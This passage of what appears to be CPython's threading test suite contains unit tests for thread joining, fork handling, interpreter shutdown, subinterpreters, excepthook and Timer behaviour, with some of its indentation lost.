t = threading.Thread(target=lambda: None)
self.assertRaises(threading.ThreadError, t.start)
self.assertFalse(
t in threading._limbo,
"Failed to cleanup _limbo map on failure of Thread.start().")
finally:
threading._start_new_thread = _start_new_thread
def test_finalize_running_thread(self):
# Issue 1402: the PyGILState_Ensure / _Release functions may be called
# very late on python exit: on deallocation of a running thread for
# example.
import_module("ctypes")
rc, out, err = assert_python_failure("-c", """if 1:
import ctypes, sys, time, _thread
# This lock is used as a simple event variable.
ready = _thread.allocate_lock()
ready.acquire()
# Module globals are cleared before __del__ is run
# So we save the functions in class dict
class C:
ensure = ctypes.pythonapi.PyGILState_Ensure
release = ctypes.pythonapi.PyGILState_Release
def __del__(self):
state = self.ensure()
self.release(state)
def waitingThread():
x = C()
ready.release()
time.sleep(100)
_thread.start_new_thread(waitingThread, ())
ready.acquire() # Be sure the other thread is waiting.
sys.exit(42)
""")
self.assertEqual(rc, 42)
def test_finalize_with_trace(self):
# Issue1733757
# Avoid a deadlock when sys.settrace steps into threading._shutdown
assert_python_ok("-c", """if 1:
import sys, threading
# A deadlock-killer, to prevent the
# testsuite to hang forever
def killer():
import os, time
time.sleep(2)
print('program blocked; aborting')
os._exit(2)
t = threading.Thread(target=killer)
t.daemon = True
t.start()
# This is the trace function
def func(frame, event, arg):
threading.current_thread()
return func
sys.settrace(func)
""")
def test_join_nondaemon_on_shutdown(self):
# Issue 1722344
# Raising SystemExit skipped threading._shutdown
rc, out, err = assert_python_ok("-c", """if 1:
import threading
from time import sleep
def child():
sleep(1)
# As a non-daemon thread we SHOULD wake up and nothing
# should be torn down yet
print("Woke up, sleep function is:", sleep)
threading.Thread(target=child).start()
raise SystemExit
""")
self.assertEqual(out.strip(),
b"Woke up, sleep function is: <built-in function sleep>")
self.assertEqual(err, b"")
def test_enumerate_after_join(self):
    """A join()ed thread must not still appear in threading.enumerate()."""
    # Try hard to trigger #1703448: a thread is still returned in
    # threading.enumerate() after it has been join()ed.
    enum = threading.enumerate
    old_interval = sys.getswitchinterval()
    try:
        # Vary the switch interval to shake out the race.
        for i in range(1, 100):
            sys.setswitchinterval(i * 0.0002)
            t = threading.Thread(target=lambda: None)
            t.start()
            t.join()
            l = enum()
            self.assertNotIn(t, l,
                "#1703448 triggered after %d trials: %s" % (i, l))
    finally:
        sys.setswitchinterval(old_interval)
def test_no_refcycle_through_target(self):
    """A finished Thread must not keep its target object alive via a refcycle."""
    class RunSelfFunction(object):
        def __init__(self, should_raise):
            # The links in this refcycle from Thread back to self
            # should be cleaned up when the thread completes.
            self.should_raise = should_raise
            self.thread = threading.Thread(target=self._run,
                                           args=(self,),
                                           kwargs={'yet_another':self})
            self.thread.start()

        def _run(self, other_ref, yet_another):
            if self.should_raise:
                raise SystemExit

    # Normal completion: the weakref must die once the object is deleted.
    cyclic_object = RunSelfFunction(should_raise=False)
    weak_cyclic_object = weakref.ref(cyclic_object)
    cyclic_object.thread.join()
    del cyclic_object
    self.assertIsNone(weak_cyclic_object(),
                      msg=('%d references still around' %
                           sys.getrefcount(weak_cyclic_object())))

    # Same check when the target exits by raising SystemExit.
    raising_cyclic_object = RunSelfFunction(should_raise=True)
    weak_raising_cyclic_object = weakref.ref(raising_cyclic_object)
    raising_cyclic_object.thread.join()
    del raising_cyclic_object
    self.assertIsNone(weak_raising_cyclic_object(),
                      msg=('%d references still around' %
                           sys.getrefcount(weak_raising_cyclic_object())))
def test_old_threading_api(self):
    """Smoke-test that deprecated camelCase threading aliases still exist."""
    # Just a quick sanity check to make sure the old method names are
    # still present
    t = threading.Thread()
    t.isDaemon()
    t.setDaemon(True)
    t.getName()
    t.setName("name")

    e = threading.Event()
    e.isSet()
    threading.activeCount()
def test_repr_daemon(self):
    """repr(Thread) should mention 'daemon' only for daemon threads."""
    t = threading.Thread()
    self.assertNotIn('daemon', repr(t))
    t.daemon = True
    self.assertIn('daemon', repr(t))
def test_daemon_param(self):
    """The Thread(daemon=...) constructor argument sets the daemon flag."""
    t = threading.Thread()
    self.assertFalse(t.daemon)
    t = threading.Thread(daemon=False)
    self.assertFalse(t.daemon)
    t = threading.Thread(daemon=True)
    self.assertTrue(t.daemon)
@unittest.skipUnless(hasattr(os, 'fork'), 'needs os.fork()')
def test_fork_at_exit(self):
    """os.fork() in an atexit handler (after threading._shutdown) must not log errors."""
    # bpo-42350: Calling os.fork() after threading._shutdown() must
    # not log an error.
    code = textwrap.dedent("""
        import atexit
        import os
        import sys
        from test.support import wait_process

        # Import the threading module to register its "at fork" callback
        import threading

        def exit_handler():
            pid = os.fork()
            if not pid:
                print("child process ok", file=sys.stderr, flush=True)
                # child process
            else:
                wait_process(pid, exitcode=0)

        # exit_handler() will be called after threading._shutdown()
        atexit.register(exit_handler)
    """)
    _, out, err = assert_python_ok("-c", code)
    self.assertEqual(out, b'')
    self.assertEqual(err.rstrip(), b'child process ok')
@unittest.skipUnless(hasattr(os, 'fork'), 'test needs fork()')
def test_dummy_thread_after_fork(self):
    """A _DummyThread in the active list must not break the after-fork cleanup."""
    # Issue #14308: a dummy thread in the active list doesn't mess up
    # the after-fork mechanism.
    code = """if 1:
        import _thread, threading, os, time

        def background_thread(evt):
            # Creates and registers the _DummyThread instance
            threading.current_thread()
            evt.set()
            time.sleep(10)

        evt = threading.Event()
        _thread.start_new_thread(background_thread, (evt,))
        evt.wait()
        assert threading.active_count() == 2, threading.active_count()
        if os.fork() == 0:
            assert threading.active_count() == 1, threading.active_count()
            os._exit(0)
        else:
            os.wait()
    """
    _, out, err = assert_python_ok("-c", code)
    self.assertEqual(out, b'')
    self.assertEqual(err, b'')
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_is_alive_after_fork(self):
    """Threads that vanish after fork() must report is_alive() == False in the child."""
    # Try hard to trigger #18418: is_alive() could sometimes be True on
    # threads that vanished after a fork.
    old_interval = sys.getswitchinterval()
    self.addCleanup(sys.setswitchinterval, old_interval)

    # Make the bug more likely to manifest.
    test.support.setswitchinterval(1e-6)

    for i in range(20):
        t = threading.Thread(target=lambda: None)
        t.start()
        pid = os.fork()
        if pid == 0:
            # Child: exit code 10 means is_alive() correctly returned False.
            os._exit(11 if t.is_alive() else 10)
        else:
            t.join()
            support.wait_process(pid, exitcode=10)
def test_main_thread(self):
    """main_thread() identifies the interpreter's main thread, not workers."""
    main = threading.main_thread()
    self.assertEqual(main.name, 'MainThread')
    self.assertEqual(main.ident, threading.current_thread().ident)
    self.assertEqual(main.ident, threading.get_ident())

    def f():
        # From a worker thread, main_thread() must differ from current_thread().
        self.assertNotEqual(threading.main_thread().ident,
                            threading.current_thread().ident)
    th = threading.Thread(target=f)
    th.start()
    th.join()
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork(self):
    """After fork() from the main thread, the child's main thread is current."""
    code = """if 1:
        import os, threading
        from test import support

        pid = os.fork()
        if pid == 0:
            main = threading.main_thread()
            print(main.name)
            print(main.ident == threading.current_thread().ident)
            print(main.ident == threading.get_ident())
        else:
            support.wait_process(pid, exitcode=0)
    """
    _, out, err = assert_python_ok("-c", code)
    data = out.decode().replace('\r', '')
    self.assertEqual(err, b"")
    self.assertEqual(data, "MainThread\nTrue\nTrue\n")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork_from_nonmain_thread(self):
    """After fork() from a worker, that worker becomes the child's main thread."""
    code = """if 1:
        import os, threading, sys
        from test import support

        def func():
            pid = os.fork()
            if pid == 0:
                main = threading.main_thread()
                print(main.name)
                print(main.ident == threading.current_thread().ident)
                print(main.ident == threading.get_ident())
                # stdout is fully buffered because not a tty,
                # we have to flush before exit.
                sys.stdout.flush()
            else:
                support.wait_process(pid, exitcode=0)

        th = threading.Thread(target=func)
        th.start()
        th.join()
    """
    _, out, err = assert_python_ok("-c", code)
    data = out.decode().replace('\r', '')
    self.assertEqual(err, b"")
    # The forking thread's name carries over as the child's main thread name.
    self.assertEqual(data, "Thread-1 (func)\nTrue\nTrue\n")
def test_main_thread_during_shutdown(self):
    """current_thread()/main_thread() stay consistent while finalizers run at shutdown."""
    # bpo-31516: current_thread() should still point to the main thread
    # at shutdown
    code = """if 1:
        import gc, threading

        main_thread = threading.current_thread()
        assert main_thread is threading.main_thread()  # sanity check

        class RefCycle:
            def __init__(self):
                self.cycle = self

            def __del__(self):
                print("GC:",
                      threading.current_thread() is main_thread,
                      threading.main_thread() is main_thread,
                      threading.enumerate() == [main_thread])

        RefCycle()
        gc.collect()  # sanity check
        x = RefCycle()
    """
    _, out, err = assert_python_ok("-c", code)
    data = out.decode()
    self.assertEqual(err, b"")
    # One line from gc.collect(), one from interpreter shutdown.
    self.assertEqual(data.splitlines(),
                     ["GC: True True True"] * 2)
def test_finalization_shutdown(self):
    """Py_Finalize() must wait for non-daemon thread states to be deleted."""
    # bpo-36402: Py_Finalize() calls threading._shutdown() which must wait
    # until Python thread states of all non-daemon threads get deleted.
    #
    # Test similar to SubinterpThreadingTests.test_threads_join_2(), but
    # test the finalization of the main interpreter.
    code = """if 1:
        import os
        import threading
        import time
        import random

        def random_sleep():
            seconds = random.random() * 0.010
            time.sleep(seconds)

        class Sleeper:
            def __del__(self):
                random_sleep()

        tls = threading.local()

        def f():
            # Sleep a bit so that the thread is still running when
            # Py_Finalize() is called.
            random_sleep()
            tls.x = Sleeper()
            random_sleep()

        threading.Thread(target=f).start()
        random_sleep()
    """
    rc, out, err = assert_python_ok("-c", code)
    self.assertEqual(err, b"")
def test_tstate_lock(self):
    """Exercise the private _tstate_lock lifecycle of a Thread (CPython detail)."""
    # Test an implementation detail of Thread objects.
    started = _thread.allocate_lock()
    finish = _thread.allocate_lock()
    started.acquire()
    finish.acquire()

    def f():
        started.release()
        finish.acquire()
        time.sleep(0.01)

    # The tstate lock is None until the thread is started
    t = threading.Thread(target=f)
    self.assertIs(t._tstate_lock, None)
    t.start()
    started.acquire()
    self.assertTrue(t.is_alive())
    # The tstate lock can't be acquired when the thread is running
    # (or suspended).
    tstate_lock = t._tstate_lock
    self.assertFalse(tstate_lock.acquire(timeout=0), False)
    finish.release()
    # When the thread ends, the state_lock can be successfully
    # acquired.
    self.assertTrue(tstate_lock.acquire(timeout=support.SHORT_TIMEOUT), False)
    # But is_alive() is still True: we hold _tstate_lock now, which
    # prevents is_alive() from knowing the thread's end-of-life C code
    # is done.
    self.assertTrue(t.is_alive())
    # Let is_alive() find out the C code is done.
    tstate_lock.release()
    self.assertFalse(t.is_alive())
    # And verify the thread disposed of _tstate_lock.
    self.assertIsNone(t._tstate_lock)
    t.join()
def test_repr_stopped(self):
    """repr(Thread) must transition to 'stopped' on its own after the thread ends."""
    # Verify that "stopped" shows up in repr(Thread) appropriately.
    started = _thread.allocate_lock()
    finish = _thread.allocate_lock()
    started.acquire()
    finish.acquire()

    def f():
        started.release()
        finish.acquire()

    t = threading.Thread(target=f)
    t.start()
    started.acquire()
    self.assertIn("started", repr(t))
    finish.release()
    # "stopped" should appear in the repr in a reasonable amount of time.
    # Implementation detail: as of this writing, that's trivially true
    # if .join() is called, and almost trivially true if .is_alive() is
    # called. The detail we're testing here is that "stopped" shows up
    # "all on its own".
    LOOKING_FOR = "stopped"
    for i in range(500):
        if LOOKING_FOR in repr(t):
            break
        time.sleep(0.01)
    self.assertIn(LOOKING_FOR, repr(t))  # we waited at least 5 seconds
    t.join()
def test_BoundedSemaphore_limit(self):
    """BoundedSemaphore must raise ValueError when released past its limit."""
    # BoundedSemaphore should raise ValueError if released too often.
    for limit in range(1, 10):
        bs = threading.BoundedSemaphore(limit)
        # Drain the semaphore from `limit` worker threads...
        threads = [threading.Thread(target=bs.acquire)
                   for _ in range(limit)]
        for t in threads:
            t.start()
        for t in threads:
            t.join()
        # ...then release it back exactly `limit` times.
        threads = [threading.Thread(target=bs.release)
                   for _ in range(limit)]
        for t in threads:
            t.start()
        for t in threads:
            t.join()
        # One more release must overflow the bound.
        self.assertRaises(ValueError, bs.release)
@cpython_only
def test_frame_tstate_tracing(self):
    """A generator created in a destroyed C thread must not crash under tracing."""
    # Issue #14432: Crash when a generator is created in a C thread that is
    # destroyed while the generator is still used. The issue was that a
    # generator contains a frame, and the frame kept a reference to the
    # Python state of the destroyed C thread. The crash occurs when a trace
    # function is setup.

    def noop_trace(frame, event, arg):
        # no operation
        return noop_trace

    def generator():
        while 1:
            yield "generator"

    def callback():
        if callback.gen is None:
            callback.gen = generator()
        return next(callback.gen)
    callback.gen = None

    old_trace = sys.gettrace()
    sys.settrace(noop_trace)
    try:
        # Install a trace function
        threading.settrace(noop_trace)

        # Create a generator in a C thread which exits after the call
        import _testcapi
        _testcapi.call_in_temporary_c_thread(callback)

        # Call the generator in a different Python thread, check that the
        # generator didn't keep a reference to the destroyed thread state
        for test in range(3):
            # The trace function is still called here
            callback()
    finally:
        sys.settrace(old_trace)
def test_gettrace(self):
    """threading.gettrace() returns what threading.settrace() installed."""
    def noop_trace(frame, event, arg):
        # no operation
        return noop_trace

    old_trace = threading.gettrace()
    try:
        threading.settrace(noop_trace)
        trace_func = threading.gettrace()
        self.assertEqual(noop_trace, trace_func)
    finally:
        threading.settrace(old_trace)
def test_getprofile(self):
    """threading.getprofile() returns what threading.setprofile() installed."""
    def fn(*args): pass

    old_profile = threading.getprofile()
    try:
        threading.setprofile(fn)
        self.assertEqual(fn, threading.getprofile())
    finally:
        threading.setprofile(old_profile)
@cpython_only
def test_shutdown_locks(self):
    """Only non-daemon threads register their tstate lock in _shutdown_locks."""
    for daemon in (False, True):
        with self.subTest(daemon=daemon):
            event = threading.Event()
            thread = threading.Thread(target=event.wait, daemon=daemon)

            # Thread.start() must add lock to _shutdown_locks,
            # but only for non-daemon thread
            thread.start()
            tstate_lock = thread._tstate_lock
            if not daemon:
                self.assertIn(tstate_lock, threading._shutdown_locks)
            else:
                self.assertNotIn(tstate_lock, threading._shutdown_locks)

            # unblock the thread and join it
            event.set()
            thread.join()

            # Thread._stop() must remove tstate_lock from _shutdown_locks.
            # Daemon threads must never add it to _shutdown_locks.
            self.assertNotIn(tstate_lock, threading._shutdown_locks)
def test_locals_at_exit(self):
    """Thread-local data must survive until destructors run at interpreter exit."""
    # bpo-19466: thread locals must not be deleted before destructors
    # are called
    rc, out, err = assert_python_ok("-c", """if 1:
        import threading

        class Atexit:
            def __del__(self):
                print("thread_dict.atexit = %r" % thread_dict.atexit)

        thread_dict = threading.local()
        thread_dict.atexit = "value"

        atexit = Atexit()
    """)
    self.assertEqual(out.rstrip(), b"thread_dict.atexit = 'value'")
def test_boolean_target(self):
    """A falsy-but-callable target must still be invoked by the thread."""
    # bpo-41149: A thread that had a boolean value of False would not
    # run, regardless of whether it was callable. The correct behaviour
    # is for a thread to do nothing if its target is None, and to call
    # the target otherwise.
    class BooleanTarget(object):
        def __init__(self):
            self.ran = False
        def __bool__(self):
            # Deliberately falsy: the old code truth-tested the target.
            return False
        def __call__(self):
            self.ran = True

    target = BooleanTarget()
    thread = threading.Thread(target=target)
    thread.start()
    thread.join()
    self.assertTrue(target.ran)
class ThreadJoinOnShutdown(BaseTestCase):
    """Tests that non-daemon threads are joined at interpreter shutdown,
    including after fork() and in the presence of daemon threads."""

    def _run_and_join(self, script):
        """Run *script* in a subprocess with a helper thread that joins the
        main thread, and check the two lines appear in the expected order."""
        script = """if 1:
            import sys, os, time, threading

            # a thread, which waits for the main program to terminate
            def joiningfunc(mainthread):
                mainthread.join()
                print('end of thread')
                # stdout is fully buffered because not a tty, we have to flush
                # before exit.
                sys.stdout.flush()
        \n""" + script

        rc, out, err = assert_python_ok("-c", script)
        data = out.decode().replace('\r', '')
        self.assertEqual(data, "end of main\nend of thread\n")

    def test_1_join_on_shutdown(self):
        # The usual case: on exit, wait for a non-daemon thread
        script = """if 1:
            import os
            t = threading.Thread(target=joiningfunc,
                                 args=(threading.current_thread(),))
            t.start()
            time.sleep(0.1)
            print('end of main')
            """
        self._run_and_join(script)

    @unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
    @unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
    def test_2_join_in_forked_process(self):
        # Like the test above, but from a forked interpreter
        script = """if 1:
            from test import support

            childpid = os.fork()
            if childpid != 0:
                # parent process
                support.wait_process(childpid, exitcode=0)
                sys.exit(0)

            # child process
            t = threading.Thread(target=joiningfunc,
                                 args=(threading.current_thread(),))
            t.start()
            print('end of main')
            """
        self._run_and_join(script)

    @unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
    @unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
    def test_3_join_in_forked_from_thread(self):
        # Like the test above, but fork() was called from a worker thread
        # In the forked process, the main Thread object must be marked as stopped.
        script = """if 1:
            from test import support

            main_thread = threading.current_thread()
            def worker():
                childpid = os.fork()
                if childpid != 0:
                    # parent process
                    support.wait_process(childpid, exitcode=0)
                    sys.exit(0)

                # child process
                t = threading.Thread(target=joiningfunc,
                                     args=(main_thread,))
                print('end of main')
                t.start()
                t.join() # Should not block: main_thread is already stopped

            w = threading.Thread(target=worker)
            w.start()
            """
        self._run_and_join(script)

    @unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
    def test_4_daemon_threads(self):
        # Check that a daemon thread cannot crash the interpreter on shutdown
        # by manipulating internal structures that are being disposed of in
        # the main thread.
        script = """if True:
            import os
            import random
            import sys
            import time
            import threading

            thread_has_run = set()

            def random_io():
                '''Loop for a while sleeping random tiny amounts and doing some I/O.'''
                while True:
                    with open(os.__file__, 'rb') as in_f:
                        stuff = in_f.read(200)
                        with open(os.devnull, 'wb') as null_f:
                            null_f.write(stuff)
                            time.sleep(random.random() / 1995)
                    thread_has_run.add(threading.current_thread())

            def main():
                count = 0
                for _ in range(40):
                    new_thread = threading.Thread(target=random_io)
                    new_thread.daemon = True
                    new_thread.start()
                    count += 1
                while len(thread_has_run) < count:
                    time.sleep(0.001)
                # Trigger process shutdown
                sys.exit(0)

            main()
            """
        rc, out, err = assert_python_ok('-c', script)
        self.assertFalse(err)

    @unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
    @unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
    def test_reinit_tls_after_fork(self):
        # Issue #13817: fork() would deadlock in a multithreaded program with
        # the ad-hoc TLS implementation.

        def do_fork_and_wait():
            # just fork a child process and wait it
            pid = os.fork()
            if pid > 0:
                support.wait_process(pid, exitcode=50)
            else:
                os._exit(50)

        # start a bunch of threads that will fork() child processes
        threads = []
        for i in range(16):
            t = threading.Thread(target=do_fork_and_wait)
            threads.append(t)
            t.start()

        for t in threads:
            t.join()

    @unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
    def test_clear_threads_states_after_fork(self):
        # Issue #17094: check that threads states are cleared after fork()

        # start a bunch of threads
        threads = []
        for i in range(16):
            t = threading.Thread(target=lambda : time.sleep(0.3))
            threads.append(t)
            t.start()

        pid = os.fork()
        if pid == 0:
            # check that threads states have been cleared
            if len(sys._current_frames()) == 1:
                os._exit(51)
            else:
                os._exit(52)
        else:
            support.wait_process(pid, exitcode=51)

        for t in threads:
            t.join()
class SubinterpThreadingTests(BaseTestCase):
    """Thread-joining behavior of subinterpreters (Py_EndInterpreter)."""

    def pipe(self):
        """Create a non-blocking pipe, closed automatically at teardown."""
        r, w = os.pipe()
        self.addCleanup(os.close, r)
        self.addCleanup(os.close, w)
        if hasattr(os, 'set_blocking'):
            os.set_blocking(r, False)
        return (r, w)

    def test_threads_join(self):
        # Non-daemon threads should be joined at subinterpreter shutdown
        # (issue #18808)
        r, w = self.pipe()
        code = textwrap.dedent(r"""
            import os
            import random
            import threading
            import time

            def random_sleep():
                seconds = random.random() * 0.010
                time.sleep(seconds)

            def f():
                # Sleep a bit so that the thread is still running when
                # Py_EndInterpreter is called.
                random_sleep()
                os.write(%d, b"x")

            threading.Thread(target=f).start()
            random_sleep()
        """ % (w,))
        ret = test.support.run_in_subinterp(code)
        self.assertEqual(ret, 0)
        # The thread was joined properly.
        self.assertEqual(os.read(r, 1), b"x")

    def test_threads_join_2(self):
        # Same as above, but a delay gets introduced after the thread's
        # Python code returned but before the thread state is deleted.
        # To achieve this, we register a thread-local object which sleeps
        # a bit when deallocated.
        r, w = self.pipe()
        code = textwrap.dedent(r"""
            import os
            import random
            import threading
            import time

            def random_sleep():
                seconds = random.random() * 0.010
                time.sleep(seconds)

            class Sleeper:
                def __del__(self):
                    random_sleep()

            tls = threading.local()

            def f():
                # Sleep a bit so that the thread is still running when
                # Py_EndInterpreter is called.
                random_sleep()
                tls.x = Sleeper()
                os.write(%d, b"x")

            threading.Thread(target=f).start()
            random_sleep()
        """ % (w,))
        ret = test.support.run_in_subinterp(code)
        self.assertEqual(ret, 0)
        # The thread was joined properly.
        self.assertEqual(os.read(r, 1), b"x")

    @cpython_only
    def test_daemon_threads_fatal_error(self):
        # A daemon thread still alive at Py_EndInterpreter must be a fatal error.
        subinterp_code = f"""if 1:
            import os
            import threading
            import time

            def f():
                # Make sure the daemon thread is still running when
                # Py_EndInterpreter is called.
                time.sleep({test.support.SHORT_TIMEOUT})
            threading.Thread(target=f, daemon=True).start()
            """
        script = r"""if 1:
            import _testcapi

            _testcapi.run_in_subinterp(%r)
            """ % (subinterp_code,)
        with test.support.SuppressCrashReport():
            rc, out, err = assert_python_failure("-c", script)
        self.assertIn("Fatal Python error: Py_EndInterpreter: "
                      "not the last thread", err.decode())
class ThreadingExceptionTests(BaseTestCase):
    """Exception behavior of the threading API: misuse errors and how
    uncaught exceptions in threads are reported."""
    # A RuntimeError should be raised if Thread.start() is called
    # multiple times.

    def test_start_thread_again(self):
        thread = threading.Thread()
        thread.start()
        self.assertRaises(RuntimeError, thread.start)
        thread.join()

    def test_joining_current_thread(self):
        # Joining the current thread would deadlock; must raise.
        current_thread = threading.current_thread()
        self.assertRaises(RuntimeError, current_thread.join);

    def test_joining_inactive_thread(self):
        # A thread that was never started cannot be joined.
        thread = threading.Thread()
        self.assertRaises(RuntimeError, thread.join)

    def test_daemonize_active_thread(self):
        # The daemon flag cannot be flipped once the thread is running.
        thread = threading.Thread()
        thread.start()
        self.assertRaises(RuntimeError, setattr, thread, "daemon", True)
        thread.join()

    def test_releasing_unacquired_lock(self):
        lock = threading.Lock()
        self.assertRaises(RuntimeError, lock.release)

    def test_recursion_limit(self):
        # Issue 9670
        # test that excessive recursion within a non-main thread causes
        # an exception rather than crashing the interpreter on platforms
        # like Mac OS X or FreeBSD which have small default stack sizes
        # for threads
        script = """if True:
            import threading

            def recurse():
                return recurse()

            def outer():
                try:
                    recurse()
                except RecursionError:
                    pass

            w = threading.Thread(target=outer)
            w.start()
            w.join()
            print('end of main thread')
            """
        expected_output = "end of main thread\n"
        p = subprocess.Popen([sys.executable, "-c", script],
                             stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        stdout, stderr = p.communicate()
        data = stdout.decode().replace('\r', '')
        self.assertEqual(p.returncode, 0, "Unexpected error: " + stderr.decode())
        self.assertEqual(data, expected_output)

    def test_print_exception(self):
        # An uncaught exception in a thread is reported on stderr via
        # threading.excepthook, not sys's "Unhandled exception" path.
        script = r"""if True:
            import threading
            import time

            running = False
            def run():
                global running
                running = True
                while running:
                    time.sleep(0.01)
                1/0
            t = threading.Thread(target=run)
            t.start()
            while not running:
                time.sleep(0.01)
            running = False
            t.join()
            """
        rc, out, err = assert_python_ok("-c", script)
        self.assertEqual(out, b'')
        err = err.decode()
        self.assertIn("Exception in thread", err)
        self.assertIn("Traceback (most recent call last):", err)
        self.assertIn("ZeroDivisionError", err)
        self.assertNotIn("Unhandled exception", err)

    def test_print_exception_stderr_is_none_1(self):
        # sys.stderr set to None after the exception is raised: the original
        # stderr captured at thread start is still used for the report.
        script = r"""if True:
            import sys
            import threading
            import time

            running = False
            def run():
                global running
                running = True
                while running:
                    time.sleep(0.01)
                1/0
            t = threading.Thread(target=run)
            t.start()
            while not running:
                time.sleep(0.01)
            sys.stderr = None
            running = False
            t.join()
            """
        rc, out, err = assert_python_ok("-c", script)
        self.assertEqual(out, b'')
        err = err.decode()
        self.assertIn("Exception in thread", err)
        self.assertIn("Traceback (most recent call last):", err)
        self.assertIn("ZeroDivisionError", err)
        self.assertNotIn("Unhandled exception", err)

    def test_print_exception_stderr_is_none_2(self):
        # sys.stderr set to None before the thread starts: nothing useful can
        # be printed, but there must be no "Unhandled exception" noise either.
        script = r"""if True:
            import sys
            import threading
            import time

            running = False
            def run():
                global running
                running = True
                while running:
                    time.sleep(0.01)
                1/0
            sys.stderr = None
            t = threading.Thread(target=run)
            t.start()
            while not running:
                time.sleep(0.01)
            running = False
            t.join()
            """
        rc, out, err = assert_python_ok("-c", script)
        self.assertEqual(out, b'')
        self.assertNotIn("Unhandled exception", err.decode())

    def test_bare_raise_in_brand_new_thread(self):
        # A bare `raise` with no active exception must produce RuntimeError,
        # even in a freshly created thread (issue 27558).
        def bare_raise():
            raise

        class Issue27558(threading.Thread):
            exc = None

            def run(self):
                try:
                    bare_raise()
                except Exception as exc:
                    self.exc = exc

        thread = Issue27558()
        thread.start()
        thread.join()
        self.assertIsNotNone(thread.exc)
        self.assertIsInstance(thread.exc, RuntimeError)
        # explicitly break the reference cycle to not leak a dangling thread
        thread.exc = None
class ThreadRunFail(threading.Thread):
    """Helper thread whose run() always raises, for excepthook tests below."""
    def run(self):
        raise ValueError("run failed")
class ExceptHookTests(BaseTestCase):
    """Behavior of threading.excepthook and its customization points."""

    def test_excepthook(self):
        # Default hook: full traceback on stderr, naming the thread.
        with support.captured_output("stderr") as stderr:
            thread = ThreadRunFail(name="excepthook thread")
            thread.start()
            thread.join()

        stderr = stderr.getvalue().strip()
        self.assertIn(f'Exception in thread {thread.name}:\n', stderr)
        self.assertIn('Traceback (most recent call last):\n', stderr)
        self.assertIn(' raise ValueError("run failed")', stderr)
        self.assertIn('ValueError: run failed', stderr)

    @support.cpython_only
    def test_excepthook_thread_None(self):
        # threading.excepthook called with thread=None: log the thread
        # identifier in this case.
        with support.captured_output("stderr") as stderr:
            try:
                raise ValueError("bug")
            except Exception as exc:
                args = threading.ExceptHookArgs([*sys.exc_info(), None])
                try:
                    threading.excepthook(args)
                finally:
                    # Explicitly break a reference cycle
                    args = None

        stderr = stderr.getvalue().strip()
        self.assertIn(f'Exception in thread {threading.get_ident()}:\n', stderr)
        self.assertIn('Traceback (most recent call last):\n', stderr)
        self.assertIn(' raise ValueError("bug")', stderr)
        self.assertIn('ValueError: bug', stderr)

    def test_system_exit(self):
        class ThreadExit(threading.Thread):
            def run(self):
                sys.exit(1)

        # threading.excepthook() silently ignores SystemExit
        with support.captured_output("stderr") as stderr:
            thread = ThreadExit()
            thread.start()
            thread.join()

        self.assertEqual(stderr.getvalue(), '')

    def test_custom_excepthook(self):
        # A replacement hook receives the full ExceptHookArgs tuple.
        args = None

        def hook(hook_args):
            nonlocal args
            args = hook_args

        try:
            with support.swap_attr(threading, 'excepthook', hook):
                thread = ThreadRunFail()
                thread.start()
                thread.join()

            self.assertEqual(args.exc_type, ValueError)
            self.assertEqual(str(args.exc_value), 'run failed')
            self.assertEqual(args.exc_traceback, args.exc_value.__traceback__)
            self.assertIs(args.thread, thread)
        finally:
            # Break reference cycle
            args = None

    def test_custom_excepthook_fail(self):
        # If the custom threading hook itself raises, the error goes through
        # sys.excepthook with a short notice on stderr.
        def threading_hook(args):
            raise ValueError("threading_hook failed")

        err_str = None

        def sys_hook(exc_type, exc_value, exc_traceback):
            nonlocal err_str
            err_str = str(exc_value)

        with support.swap_attr(threading, 'excepthook', threading_hook), \
             support.swap_attr(sys, 'excepthook', sys_hook), \
             support.captured_output('stderr') as stderr:
            thread = ThreadRunFail()
            thread.start()
            thread.join()

        self.assertEqual(stderr.getvalue(),
                         'Exception in threading.excepthook:\n')
        self.assertEqual(err_str, 'threading_hook failed')

    def test_original_excepthook(self):
        # threading.__excepthook__ restores the original default behavior.
        def run_thread():
            with support.captured_output("stderr") as output:
                thread = ThreadRunFail(name="excepthook thread")
                thread.start()
                thread.join()
            return output.getvalue()

        def threading_hook(args):
            print("Running a thread failed", file=sys.stderr)

        default_output = run_thread()
        with support.swap_attr(threading, 'excepthook', threading_hook):
            custom_hook_output = run_thread()
        threading.excepthook = threading.__excepthook__
        recovered_output = run_thread()
        self.assertEqual(default_output, recovered_output)
        self.assertNotEqual(default_output, custom_hook_output)
        self.assertEqual(custom_hook_output, "Running a thread failed\n")
class TimerTests(BaseTestCase):
    """Tests for threading.Timer."""

    def setUp(self):
        BaseTestCase.setUp(self)
        # Records (args, kwargs) seen by the spy callback for each Timer fire.
        self.callback_args = []
        self.callback_event = threading.Event()

    def test_init_immutable_default_args(self):
        # Issue 17435: constructor defaults were mutable objects, they could be
        # mutated via the object attributes and affect other Timer objects.
        timer1 = threading.Timer(0.01, self._callback_spy)
        timer1.start()
        self.callback_event.wait()
        # Mutating timer1's args/kwargs must not leak into other Timers.
        timer1.args.append("blah")
        timer1.kwargs["foo"] = "bar"
        self.callback_event.clear()
        timer2 = threading.Timer(0.01, self._callback_spy)
        timer2.start()
        self.callback_event.wait()
        self.assertEqual(len(self.callback_args), 2)
        self.assertEqual(self.callback_args, [((), {}), ((), {})])
        timer1.join()
        timer2.join()

    def _callback_spy(self, *args, **kwargs):
        # Record a snapshot of the call arguments, then signal the test.
        self.callback_args.append((args[:], kwargs.copy()))
        self.callback_event.set()
class LockTests(lock_tests.LockTests):
    # Run the shared lock test suite against threading.Lock.
